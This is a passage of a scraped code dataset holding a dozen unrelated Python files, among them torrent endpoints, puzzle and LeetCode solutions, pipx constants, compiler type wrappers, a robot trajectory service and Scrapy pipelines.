hash_keys))\n\tprint(paths)\n\t# import pdb; pdb.set_trace()\n\tif paths:\n\t\ttry:\n\t\t\ttorrent_paths = []\n\t\t\tfor path in paths:\n\t\t\t\ttorrent_path = \"{}/{}\".format(config.TORRENT_CACHE, path)\n\t\t\t\ttorrent_paths.append(torrent_path)\n\t\t\trun_async(partial(pause_torrent, paths, config.DOWNLOAD_DIR))\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception occurred: {}\".format(e))\n\t\t\treturn e\n\t\treturn list(paths)\n\telse:\n\t\treturn FileNotFoundError(\"Hash key must be invalid\")\n\n\n# resume a download specified by a specific key\ndef resume(f_names, hash_keys):\n\tprint(hash_keys)\n\tpaths = list(map(\n\t\tlambda hash_key: f_names.get(hash_key), hash_keys))\n\tprint(paths)\n\t# import pdb; pdb.set_trace()\n\tif paths:\n\t\ttry:\n\t\t\ttorrent_paths = []\n\t\t\tfor path in paths:\n\t\t\t\ttorrent_path = \"{}/{}\".format(config.TORRENT_CACHE, path)\n\t\t\t\ttorrent_paths.append(torrent_path)\n\t\t\n\t\t\trun_async(partial(resume_torrent, 
paths, config.DOWNLOAD_DIR))\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception occurred: {}\".format(e))\n\t\t\treturn e\n\t\treturn list(paths)\n\telse:\n\t\treturn FileNotFoundError(\"Hash key must be invalid\")\n\n\n# retrieve downloaded file on client side\n# returns paths (on the server) to directories containing the completed torrents\ndef retrieve(f_names, hash_keys):\n\tpaths = []\n\tfor key in hash_keys:\n\t\tpath = f_names.get(key)\n\t\tif path:\n\t\t\tpaths.append(path.replace(\".torrent\", \"/\"))\n\t\telse:\n\t\t\treturn FileNotFoundError(\"Hash key {} is invalid\".format(key))\n\n\treturn paths\n\n\n# displays info on the torrent that you are downloading\ndef info(f_names, hash_keys):\n    for key in hash_keys:\n        path = f_names.get(key)\n        if path:\n            torrent_info = TorrentInfo.from_file(path, download_dir=None)\n            content_description = formatters.join_lines(\n                formatters.format_title(torrent_info, True) + formatters.format_content(torrent_info))\n            yield content_description\n        else:\n            yield FileNotFoundError(\"Hash key {} is invalid\".format(key))\n","sub_path":"server/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"448146596","text":"# a \"balanced\" bracket string has the same number of '(' and ')'\n# a \"correct\" bracket string is balanced and every pair of brackets also matches\nimport sys\nsys.setrecursionlimit(10000)\n\ndef solution(p):\n    answer = ''\n    # flip the direction of every bracket\n    def change(word):\n        change_word = ''\n        for w in word:\n            change_word += ')' if w == '(' else '('\n        return change_word\n    # check whether the string is a correct bracket string\n    def right(word):\n        if len(word) == 0: return 0\n        left, right = 0, 0\n        for i in word:\n            if i == '(':\n                left += 1\n            elif i == ')':\n                right += 1\n                if right >= left:\n                    break\n        return 1 if left+right == len(word) else 0\n    # apply rules 3 and 4 of the problem statement\n    def go(u, v):\n        if right(u): # rule 3: u is already a correct bracket string\n            u += solution(v) # rule 3-1: append the recursive result to u\n            return u # rule 3-1: and return it\n        else: # rule 4: u is not a correct bracket string\n            a = '(' # rule 4-1: start a new string with '('\n            a += solution(v) # rule 4-2: append the result of recursing on v from step 1\n            a += ')' # rule 4-3: append ')'\n            a += change(u[1:len(u)-1]) # rule 4-4: drop u's first and last characters, flip the rest, append\n            return a # rule 4-5: return\n    # find the end of the shortest balanced prefix\n    def balance(word):\n        cnt = 0\n        idx = 0\n        while 1:\n            if word[idx] == ')':\n                cnt -= 1\n            else:\n                cnt += 1\n            if cnt == 0:\n                return idx\n            idx += 1\n\n    L = len(p)\n    if L == 0: # rule 1: empty string\n        return answer\n    # rule 2: already correct\n    if right(p):\n        return p\n    else:\n        idx = balance(p)\n\n    if idx == L-1: # the whole string is the shortest balanced prefix\n        # print('end')\n        answer = go(p, '')\n    else: # the string can be split in the middle\n        # print('middle')\n        print(p[:idx+1], p[idx+1:])\n        answer = go(p[:idx+1], p[idx+1:])\n\n\n    # lg, rg = '', ''\n    # left, right = 0, 0\n    # while 1:\n    return answer\n\n# print(solution(\"(()())()\"))\n# print(solution(\")(\"))\nprint(solution(\"()))((()\"))\n# print(solution(\"))((()\"))\n\n# def check(one):","sub_path":"0524/괄호 변환_김현성.py","file_name":"괄호 변환_김현성.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"393315045","text":"#!/usr/bin/env python3\nfrom random import shuffle;\n\ndef getSequences (stepsTaken, initialState, targetState):\n\tevaluation = hamming (stepsTaken, initialState, targetState);\n\tnextState = initialState;\n\tpreviousState = None;\n\tsequence = [];\n\tcount = 0;\n\n\twhile (not evaluation == 0):\n\t\tnextStates = getNextStates (nextState);\n\t\tif (not previousState == None):\n\t\t\tnextStates.pop (nextStates.index 
(previousState));\n\n\t\tcosts = [hamming (stepsTaken, state, targetState) for state in nextStates];\n\t\tevaluation = min (costs);\n\t\tpreviousState = nextState;\n\t\tnextState = nextStates [costs.index (evaluation)];\n\t\tsequence.append (nextState);\n\t\tstepsTaken += 1;\n\n#\t\tprint (\"Next states: \", nextStates);\n#\t\tprint (\"Costs: \", costs);\n#\t\tprint (\"Min Cost: \", evaluation);\n#\t\tprint (\"Next state to take: \", nextState);\n#\t\tprint (\"Steps taken: \", stepsTaken);\n#\t\tprint (\"Total sequence: \", sequence);\n#\t\tif (count == 3):\n#\t\t\tbreak;\n#\n#\t\tcount += 1;\n\n\treturn (stepsTaken, sequence);\n\n#getNextStates () generates all the possible states that could exist after we take 1 step, give the current state of the puzzle board\ndef getNextStates (currentState):\n\tstates = [];\n\t#the changePositions dicitonary is specific for this puzzle, since it has 9 squares (position 0 to 8). For each position X, we assume that the blank ('-') exists at X and then feed in the positions of the tiles that can be moved.\n\t#for eg - if '-' exists at position 0, i.e., top left of board, then the positions are 1 and 3 because the tile to the blank's right can be moved to left, and the tile below the blank can be moved up.\n\tchangePositions = {\n\t\t0 : [1, 3],\n\t\t1 : [0, 2, 4],\n\t\t2 : [1, 5],\n\t\t3 : [0, 4, 6],\n\t\t4 : [1, 3, 5, 7],\n\t\t5 : [2, 4, 8],\n\t\t6 : [3, 7],\n\t\t7 : [4, 6, 8],\n\t\t8 : [5, 7]\n\t};\n\n\tfor i in range (0, len (currentState)):\n\t\tif (currentState [i] == '-'):\n\t\t\tslideTiles = changePositions [i];\n\t\t\tfor pos in slideTiles:\n\t\t\t\ttemp = list (currentState);\n\t\t\t\tbuf = temp [pos];\n\t\t\t\ttemp [pos] = '-';\n\t\t\t\ttemp [i] = buf;\n\t\t\t\tstates.append (''.join (temp));\n\n\treturn (states);\n\ndef hamming (stepsTaken, currentState, targetState):\n\twrongCount = 0;\n\n\twrongCount = len ([i for i in range (0, len (targetState)) if not (currentState [i] == targetState [i] or currentState [i] == '-')]);\n\treturn (wrongCount + stepsTaken);\n\nif (__name__ == '__main__'):\n\tstepsTaken = 0;\n\ttargetState = '12345678-';\n\n\tinitialState = list (targetState);\n\tshuffle (initialState);\n\tinitialState = ''.join (initialState);\n\n\tprint (\"Initial State is: \");\n\tfor i in range (0, len (initialState), 3):\n\t\tprint (initialState [i], initialState [i + 1], initialState [i + 2]);\n\n\tprint (\"\\nTarget State is: \");\n\tfor i in range (0, len (targetState), 3):\n\t\tprint (targetState [i], targetState [i + 1], targetState [i + 2]);\n\n\tprint (\"\\n----------------------------------\\n\");\n\tstepsTaken, sequence = getSequences (stepsTaken, initialState, targetState);\n#\tprint (\"Solved in \" + str (stepsTaken) + \" steps.\");\n\n#\tprint (\"\\n-------------------------------------------\\n\");\n#\tfor sequence in sequences:\n#\t\tfor i in range (0, len (sequence), 3):\n#\t\t\tprint (sequence [i], sequence [i + 1], sequence [i + 2]);\n#\t\tprint (\"\\n-------------------------------------------\\n\");\n","sub_path":"Heuristics/8 Puzzle through A*/8_puzzle.py","file_name":"8_puzzle.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"377218707","text":"from matplotlib import pyplot as plt\nfrom matplotlib import style\nimport numpy as np\n\nstyle.use('ggplot')\nplt.title('Max Fitness in Each Generation')\nplt.xlabel('Generations')\nplt.ylabel('Fitness')\n\nx = np.load('plots.npy')\n\nxaxis = [i[0] for i in x]\nyaxis = [i[1] 
for i in x]\nprint(yaxis)\nplt.plot(xaxis,yaxis)\nplt.show()\n\n","sub_path":"CartPole/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"459921032","text":"class Solution:\r\n # @param num, a list of integer\r\n # @return an integer\r\n def findMin(self, num):\r\n \"\"\"\r\n Fourth iteration\r\n \"\"\"\r\n n = len(num)\r\n l, r = 0, n - 1\r\n while l < r:\r\n m = (l + r) / 2\r\n if m + 1 < n and num[m] > num[m + 1]:\r\n l = m\r\n break\r\n if num[l] > num[m]:\r\n r = m\r\n else:\r\n l = m + 1\r\n return num[l + 1] if l + 1 < n else num[0]\r\n\r\ndef run():\r\n sol = Solution()\r\n ret = sol.findMin([4,5,6,7,0,1,2])\r\n assert ret == 0\r\n\r\n ret = sol.findMin([0])\r\n assert ret == 0\r\n\r\n ret = sol.findMin([1,2])\r\n assert ret == 1\r\n\r\n ret = sol.findMin([2,3,4,5,1])\r\n assert ret == 1\r\n","sub_path":"153-find-minimum-in-rotated-sorted-array.py","file_name":"153-find-minimum-in-rotated-sorted-array.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357958306","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n \n\n aCount = 0\n bCount = 0\n \n temp = headA\n while temp != None:\n aCount += 1\n temp = temp.next\n\n temp = headB\n while temp != None:\n bCount += 1\n temp = temp.next\n\n if aCount == 0 or bCount ==0:\n return None\n \n diff = abs(aCount - bCount)\n\n if headA.val == headB.val:\n return headB\n\n if aCount > bCount:\n for _ in range(diff):\n headA = headA.next\n elif aCount < bCount:\n for _ in range(diff):\n headB = headB.next\n\n while headA != None or headB != None:\n if headA.val == headB.val:\n return headA\n headA = headA.next\n headB = headB.next\n\n return None\n\n\n# a1<--a2\n# +\n# \\ last\n# c1<--c2<--c3\n# +\n# /\n# b1-->b2-->b3\n\n ","sub_path":"intersection-of-two-linked-lists.py","file_name":"intersection-of-two-linked-lists.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"612772717","text":"import os\nimport sys\nfrom pathlib import Path\nfrom textwrap import dedent\n\nDEFAULT_PYTHON = sys.executable\nDEFAULT_PIPX_HOME = Path.home() / \".local/pipx\"\nDEFAULT_PIPX_BIN_DIR = Path.home() / \".local/bin\"\nPIPX_HOME = Path(os.environ.get(\"PIPX_HOME\", DEFAULT_PIPX_HOME)).resolve()\nPIPX_LOCAL_VENVS = PIPX_HOME / \"venvs\"\nLOCAL_BIN_DIR = Path(os.environ.get(\"PIPX_BIN_DIR\", DEFAULT_PIPX_BIN_DIR)).resolve()\nPIPX_VENV_CACHEDIR = PIPX_HOME / \".cache\"\nPIPX_PACKAGE_NAME = \"pipx\"\nTEMP_VENV_EXPIRATION_THRESHOLD_DAYS = 14\n\ncompletion_instructions = dedent(\n \"\"\"\nAdd the appropriate command to your shell's config file\nso that it is run on startup. 
You will likely have to restart\nor re-login for the autocompletion to start working.\n\nbash:\n eval \"$(register-python-argcomplete pipx)\"\n\nzsh:\n To activate completions for zsh you need to have\n bashcompinit enabled in zsh:\n\n autoload -U bashcompinit\n bashcompinit\n\n Afterwards you can enable completion for pipx:\n\n eval \"$(register-python-argcomplete pipx)\"\n\ntcsh:\n eval `register-python-argcomplete --shell tcsh pipx`\n\nfish:\n register-python-argcomplete --shell fish pipx | .\n\n\"\"\"\n)\n","sub_path":"pipx/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"541663737","text":"from nativepython.typed_expression import TypedExpression\nimport nativepython.native_ast as native_ast\nfrom nativepython.type_wrappers.wrapper import Wrapper\nfrom nativepython.type_wrappers.none_wrapper import NoneWrapper\nfrom nativepython.type_wrappers.python_type_wrappers import PythonTypeObjectWrapper\nfrom nativepython.type_wrappers.python_free_function_wrapper import PythonFreeFunctionWrapper\nfrom nativepython.type_wrappers.python_typed_function_wrapper import PythonTypedFunctionWrapper\nfrom nativepython.type_wrappers.tuple_of_wrapper import TupleOfWrapper\nfrom nativepython.type_wrappers.list_of_wrapper import ListOfWrapper\nfrom nativepython.type_wrappers.one_of_wrapper import OneOfWrapper\nfrom nativepython.type_wrappers.class_wrapper import ClassWrapper\nfrom nativepython.type_wrappers.const_dict_wrapper import ConstDictWrapper\nfrom nativepython.type_wrappers.tuple_wrapper import TupleWrapper, NamedTupleWrapper\nfrom nativepython.type_wrappers.alternative_wrapper import makeAlternativeWrapper\nfrom nativepython.type_wrappers.bound_method_wrapper import BoundMethodWrapper\nfrom nativepython.type_wrappers.len_wrapper import LenWrapper\nfrom nativepython.type_wrappers.arithmetic_wrapper import Int64Wrapper, Float64Wrapper, BoolWrapper\nfrom nativepython.type_wrappers.string_wrapper import StringWrapper\nfrom nativepython.type_wrappers.bytes_wrapper import BytesWrapper\nfrom nativepython.type_wrappers.python_object_of_type_wrapper import PythonObjectOfTypeWrapper\nfrom typed_python._types import TypeFor\nfrom typed_python import *\n\n_type_to_type_wrapper_cache = {}\n\ndef typedPythonTypeToTypeWrapper(t):\n if t not in _type_to_type_wrapper_cache:\n _type_to_type_wrapper_cache[t] = _typedPythonTypeToTypeWrapper(t)\n return _type_to_type_wrapper_cache[t]\n\ndef _typedPythonTypeToTypeWrapper(t):\n if isinstance(t, Wrapper):\n return t\n\n if not hasattr(t, '__typed_python_category__'):\n t = TypeFor(t)\n assert hasattr(t, '__typed_python_category__'), t\n\n if t is Int64():\n return Int64Wrapper()\n\n if t is Float64():\n return Float64Wrapper()\n\n if t is Bool():\n return BoolWrapper()\n\n if t is NoneType():\n return NoneWrapper()\n\n if t is String():\n return StringWrapper()\n\n if t is Bytes():\n return BytesWrapper()\n\n if t.__typed_python_category__ == \"Class\":\n return ClassWrapper(t)\n\n if t.__typed_python_category__ == \"Alternative\":\n return makeAlternativeWrapper(t)\n\n if t.__typed_python_category__ == \"ConstDict\":\n return ConstDictWrapper(t)\n\n if t.__typed_python_category__ == \"ConcreteAlternative\":\n return makeAlternativeWrapper(t)\n\n if t.__typed_python_category__ == \"NamedTuple\":\n return NamedTupleWrapper(t)\n\n if t.__typed_python_category__ == \"Tuple\":\n return TupleWrapper(t)\n\n if t.__typed_python_category__ == 
\"ListOf\":\n return ListOfWrapper(t)\n\n if t.__typed_python_category__ == \"Function\":\n return PythonTypedFunctionWrapper(t)\n\n if t.__typed_python_category__ == \"BoundMethod\":\n return BoundMethodWrapper(t)\n\n if t.__typed_python_category__ == \"TupleOf\":\n return TupleOfWrapper(t)\n\n if t.__typed_python_category__ == \"OneOf\":\n return OneOfWrapper(t)\n\n if t.__typed_python_category__ == \"PythonObjectOfType\":\n return PythonObjectOfTypeWrapper(t)\n\n assert False, t\n\ndef pythonObjectRepresentation(context, f):\n if f is len:\n return TypedExpression(context, native_ast.nullExpr, LenWrapper(), False)\n\n if f is None:\n return TypedExpression(\n context,\n native_ast.Expression.Constant(\n val=native_ast.Constant.Void()\n ),\n NoneWrapper(),\n False\n )\n if isinstance(f, bool):\n return TypedExpression(\n context,\n native_ast.Expression.Constant(\n val=native_ast.Constant.Int(val=f,bits=1,signed=False)\n ),\n BoolWrapper(),\n False\n )\n if isinstance(f, int):\n return TypedExpression(\n context,\n native_ast.Expression.Constant(\n val=native_ast.Constant.Int(val=f,bits=64,signed=True)\n ),\n Int64Wrapper(),\n False\n )\n if isinstance(f, float):\n return TypedExpression(\n context,\n native_ast.Expression.Constant(\n val=native_ast.Constant.Float(val=f,bits=64)\n ),\n Float64Wrapper(),\n False\n )\n if isinstance(f, str):\n return StringWrapper().constant(context, f)\n if isinstance(f, bytes):\n return BytesWrapper().constant(context, f)\n\n if isinstance(f, type(pythonObjectRepresentation)):\n return TypedExpression(\n context,\n native_ast.nullExpr,\n PythonFreeFunctionWrapper(f),\n False\n )\n\n if hasattr(f, '__typed_python_category__'):\n if f.__typed_python_category__ == \"Function\":\n return TypedExpression(\n context,\n native_ast.nullExpr,\n PythonTypedFunctionWrapper(f),\n False\n )\n\n if isinstance(f, type):\n return TypedExpression(context, native_ast.nullExpr, PythonTypeObjectWrapper(f), False)\n\n assert False, f\n","sub_path":"nativepython/python_object_representation.py","file_name":"python_object_representation.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"217147105","text":"\"\"\"\nMingyang Xue, Coco Cheng\nCSE 163 AG, AF\n\nThis file cleans up the data that is going to be\nused for q1 by filtering old data and missing values\n\"\"\"\n\n\nimport pandas as pd\n\n\ndef cleanData(data):\n \"\"\"\n Takes in the dataset data1\n Filters old data and missing values\n and sorts by time\n Returns the cleaned dataframe\n \"\"\"\n dt = data.dropna(subset=['Year', 'Avg hrs per day sleeping', 'Age Group'])\n min_y = data['Year'] >= 2004\n max_y = data['Year'] <= 2016\n dt = data[min_y & max_y]\n dt = dt.sort_values('Year')\n return dt\n\n\ndef main():\n data = pd.read_excel('/home/data1.xlsx')\n cleanData(data)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Insomnia and its impact/q1CleanData.py","file_name":"q1CleanData.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"142776811","text":"\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nsns.set(color_codes=True)\ncd = ['Clinton', 'Trump', 'Sanders', 'Cruz']\n\nax = sns.barplot(cd, [9, 77, 6, 
15])\nax.set(ylabel='count')\nplt.show()","sub_path":"Cap18-Extras/44_seaborn.py","file_name":"44_seaborn.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"553202716","text":"class Student:\n    def __init__(self,name,age,scores):\n        self.name=name\n        self.age=age\n        # self.yu=scores[0]\n        # self.shu=scores[1]\n        # self.ying=scores[2]\n        self.max=max(scores)\n        self.max_course=[]\n        for i in range(len(scores)):\n            if self.max==scores[i]:\n                if i==0:\n                    self.max_course.append('语文')\n                elif i==1:\n                    self.max_course.append('数学')\n                else:\n                    self.max_course.append('英语')\n    def get_name(self):\n        return self.name\n    def get_age(self):\n        return self.age\n    def get_course(self):\n        return self.max\nxiaoming=Student('小明',20,[90,100,100])\nname=xiaoming.get_name()\nprint('学生的姓名为:{}'.format(name))\nage=xiaoming.get_age()\nprint('{}的年龄为:{}岁'.format(name,age))\ncourse=xiaoming.get_course()\nprint('最高的成绩为:',end='')\nfor i in xiaoming.max_course:\n    print(i,end=':')\n    print('{}'.format(course),end=' ')\nprint()\n\n\n","sub_path":"python作业实战67-71/源码/69.py","file_name":"69.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"276541402","text":"import os\n\nclass Page:\n    file_data = None\n    first_value = 0\n    last_value = 0\n\n    def __init__(self, file_data):\n        self.file_data = file_data\n        self.file_data.tab_sizes = self.calculate_tabsize(file_data)\n\n    def show_page(self, first_value, last_value):\n        titles = self.file_data.titles\n        tab_sizes = self.file_data.tab_sizes\n        data_list = self.file_data.data_list\n\n        self.first_value = first_value\n        self.last_value = last_value\n        \n        title_string = \"\\n  \"\n        for key in titles:\n            title_string += key.ljust(tab_sizes[key])\n        print(title_string)\n\n        for i in range(self.first_value, self.last_value):\n            if i >= len(data_list):\n                break\n            \n            values_string = \"  \"\n            row = data_list[i]\n            for key in row:\n                values_string += row[key].ljust(tab_sizes[key])\n            print(values_string)\n        help_str = \"\\n  ←: first page  ↑: previous page  ↓: next page  →: last page \\n\" + \\\n            \"\\n  pageDown: previous entry  pageUp: next entry  esc: exit\"\n        print(help_str)\n\n    def create_page(self, current_page):\n        num_of_pages = self.file_data.num_of_pages\n        page_size = self.file_data.page_size\n\n        if current_page < 1:\n            current_page = 1\n        elif current_page > num_of_pages:\n            current_page = num_of_pages\n        \n        first_value = (page_size * current_page) - page_size\n        last_value = page_size * current_page\n\n        os.system(\"cls\")\n        print(\"\\n  Page: \", current_page,\"/\", num_of_pages, \"\\n  Pagesize: \", page_size)\n\n        self.show_page(first_value, last_value)\n\n        return current_page\n\n    def calculate_tabsize(self, file_data):\n        tabsize_dict = {}\n\n        for title in file_data.titles:\n            tabsize_dict[title] = 0\n            for row in file_data.data_list:\n                if len(row[title]) > int(tabsize_dict[title]):\n                    tabsize_dict[title] = len(row[title])\n            tabsize_dict[title] += 5\n        return tabsize_dict\n","sub_path":"Exercise 1/TextViewer/pageviewer.py","file_name":"pageviewer.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"382241499","text":"# -*- coding: utf-8 -*-\n# Author: XuMing \n# Brief: \nfrom domain.pos import POS_WEIGHT\n\n\ndef word_pos_similarity(l1, l2, similarity_type='word', pos_weight=None, embedding=None):\n    \"\"\"\n    get similarity score by text vector and pos vector\n    :param l1: input sentence list\n    :param l2: sentence list which to be compared\n    :param similarity_type:\n    :param pos_weight:\n    :param embedding:\n    :return:\n    \"\"\"\n    if not l1 or not l2:\n        return 0\n    pos_weight = pos_weight or POS_WEIGHT\n    if similarity_type == 'word':\n        # simple word name overlapping coefficient\n        return len(set(l1) & set(l2)) / len(set(l2))\n    elif similarity_type == 'word_pos':\n        # word and pos overlapping coefficient\n        sim_weight = 0\n        for word, pos in set(l1):\n            sim_weight += pos_weight.get(pos, 1) if word in l2 else 0\n        total_weight = sum(pos_weight.get(pos, 1) for _, pos in set(l1))\n        return sim_weight / total_weight if total_weight > 0 else 0\n    elif similarity_type == 'vector' and embedding:\n        # word vector and pos weight\n        sim_weight = 0\n        total_weight = 0\n        for word, pos in l1:\n            if word not in embedding.index2word:\n                continue\n            cur_weight = pos_weight.get(pos, 1)\n            max_word_sim = max([embedding.similarity(word_l2, word) for word_l2 in l2])\n            sim_weight += cur_weight * max_word_sim\n            total_weight += cur_weight\n        return sim_weight / total_weight if total_weight > 0 else 0\n    return 0\n\n\nif __name__ == '__main__':\n    print(word_pos_similarity([1, 2], [3, 2]))\n","sub_path":"domain/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"541498425","text":"import numpy as np\nimport rospy\nimport scipy.io as sio\nfrom promp.copromp import CoProMP\nfrom promp.utils.utils import linear_phase\nfrom promp.utils.utils import normalized_gaussian_basis\n\nfrom robot_serving.srv import *\nfrom Baxter_Movement_Aux.baxter_connection import BaxterConnection, GoalStatus, baxter_interface\nfrom Baxter_Movement_Aux.trajectory_executor import TrajectoryExecutor\nfrom std_msgs.msg import Int32\n\n\nclass LegibleTrajectoryServer(object):\n\n\tdef __init__(self):\n\n\t\tself._service_server = rospy.Service(\"movement_decision_legible\", Movement, self.legible_traj_srv_handler)\n\t\tself._Y = []\n\t\tself._O = []\n\t\tself.load_trajs()\n\n\t\t\"\"\"\n\t\trospy.loginfo(\"Creating COPMP\")\n\t\tself._copmp = CoProMP(self._O, self._Y, 3, 7, o_dt=1, dt=0.001, Sigma_y=None)\n\t\tself._copmp.build(linear_phase, lambda z, dt: normalized_gaussian_basis(2, z, dt),\n\t\t\t\t\t\t  linear_phase, lambda z, dt: normalized_gaussian_basis(10, z, dt))\n\t\trospy.loginfo(\"COPMP created\")\n\t\t\"\"\"\n\n\t\tself._baxter_connect = BaxterConnection()\n\n\t\tself._log_file = open('log_trajectory.txt', 'w')\n\t\trospy.on_shutdown(self._log_file.close)\n\t\tself._can_start = False\n\n\t\tself._start_sginal = rospy.Subscriber('/start', Int32, self.start_handler)\n\n\t\twhile not self._can_start:\n\t\t\tpass\n\n\t\tself._start_sginal.unregister()\n\t\tself.send_neutral()\n\n\t\trospy.loginfo(\"Legible trajectory service server created\")\n\n\tdef send_neutral(self):\n\t\tstarting_position = {\n\t\t\t'left': {\n\t\t\t\t'left_s0': 0.5721748332275391,\n\t\t\t\t'left_s1': 0.2784175126831055,\n\t\t\t\t'left_w0': 0.13038836682128907,\n\t\t\t\t'left_w1': 0.730558349395752,\n\t\t\t\t'left_w2': -1.0507768385009766,\n\t\t\t\t'left_e0': -1.047708876928711,\n\t\t\t\t'left_e1': 2.012199296209717\n\t\t\t},\n\t\t\t'right': {\n\t\t\t\t'right_s0': -0.4460049135681153,\n\t\t\t\t'right_s1': 0.03873301484985352,\n\t\t\t\t'right_w0': -0.18292720874633792,\n\t\t\t\t'right_w1': 0.6446554253723145,\n\t\t\t\t'right_w2': -1.5370487477050783,\n\t\t\t\t'right_e0': 1.5604419546936037,\n\t\t\t\t'right_e1': 2.1698158219848636\n\t\t\t}\n\t\t}\n\n\t\tleft = baxter_interface.Limb('left')\n\t\tright = baxter_interface.Limb('right')\n\n\t\tleft.move_to_joint_positions(starting_position['left'])\n\t\tright.move_to_joint_positions(starting_position['right'])\n\n\tdef start_handler(self, msg):\n\t\trospy.loginfo(\"Handler\")\n\t\tif msg.data == 1:\n\t\t\tself._can_start = True\n\n\tdef load_trajs(self):\n\t\tN = 20\n\t\tlegible_trajs = []\n\t\tlegible_targets = []\n\t\tfor i in range(1, N + 1):\n\t\t\tprint('clean_trajectories/legible_traj%d.mat' % i)\n\t\t\tlegible_trajs.append(\n\t\t\t\t\tsio.loadmat('./trajectory_recording/clean_trajectories/legible_traj%d.mat' % i)['traj'][:, 1:7 + 1])\n\t\t\tlegible_targets.append(\n\t\t\t\t\tsio.loadmat('./trajectory_recording/clean_trajectories/legible_traj%d.mat' % i)['target'])\n\n\t\tself._Y = np.hstack(legible_trajs)\n\t\tself._O = np.hstack(legible_targets)\n\n\tdef legible_traj_srv_handler(self, req):\n\t\tresult = 1\n\t\ttarget = [req.x_pos, req.y_pos, req.z_pos]\n\t\tnew_o = np.vstack(target)\n\n\t\trospy.loginfo(\"Creating COPMP\")\n\t\tcopmp = CoProMP(self._O, self._Y, 3, 7, o_dt=1, dt=0.0001, Sigma_y=None)\n\t\tcopmp.build(linear_phase, lambda z, dt: normalized_gaussian_basis(2, z, dt),\n\t\t\t\t\tlinear_phase, lambda z, dt: normalized_gaussian_basis(10, z, dt))\n\t\trospy.loginfo(\"COPMP created\")\n\n\t\trospy.loginfo(\"Conditioning COPMP to target\")\n\t\tcopmp.condition(new_o, 1)\n\t\tymp = copmp.most_probable()\n\n\t\ttime = ymp[:, 0][:, np.newaxis]\n\t\tright_traj = ymp[:, 1:7 + 1]\n\n\t\trospy.loginfo(\"Executing legible trajectory\")\n\t\tte = TrajectoryExecutor(time, 10, None, right_traj)\n\t\tte.execute()\n\n\t\trospy.loginfo(\"Legible trajectory executed\")\n\n\t\treturn MovementResponse(result)\n","sub_path":"robot_serving/src/Movement/Baxter_Movement_Aux/legible_traj_service.py","file_name":"legible_traj_service.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"224888042","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom scrapy.exceptions import DropItem\nfrom .items import *\nimport os\n\ncheckFile = 'isRunning.txt'\n\n\nclass StatusPipeline(object):\n    def open_spider(self, spider):\n        if spider.name == 'tianya':\n            f = open(checkFile, 'w')  # 创建文件代表爬虫正在执行\n            f.close()\n\n    def close_spider(self, spider):\n        isFileExist = os.path.isfile(checkFile)  # 结束删除标识文件\n        if isFileExist:\n            os.remove(checkFile)\n\n\nclass LinksItemPipeline(object):\n    def process_item(self, item, spider):\n        if isinstance(item, LinksItem):\n            try:\n                item.save()\n            except:\n                raise DropItem('Links Duplicate')  # 回复帖子在上次的页面上回复的 会在抓取到这个页面,链接不存\n        return item\n\n\nclass StoryItemPipeline(object):\n    def process_item(self, item, spider):\n        # 帖子的作者 若此是空字符串说明是问答贴,drop\n        if isinstance(item, StoryItem):\n            if item[\"story_author\"] == \"\":\n                raise DropItem('Useless item found!')\n            elif item[\"story_content\"] == \"Useless\":\n                raise DropItem('Useless item found!')\n            try:\n                item.save()\n            except:\n                raise DropItem('save failed')\n        return item\n","sub_path":"scrapy_django_tianya_new/tianya/bots/tianya_spider/tianya_spider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
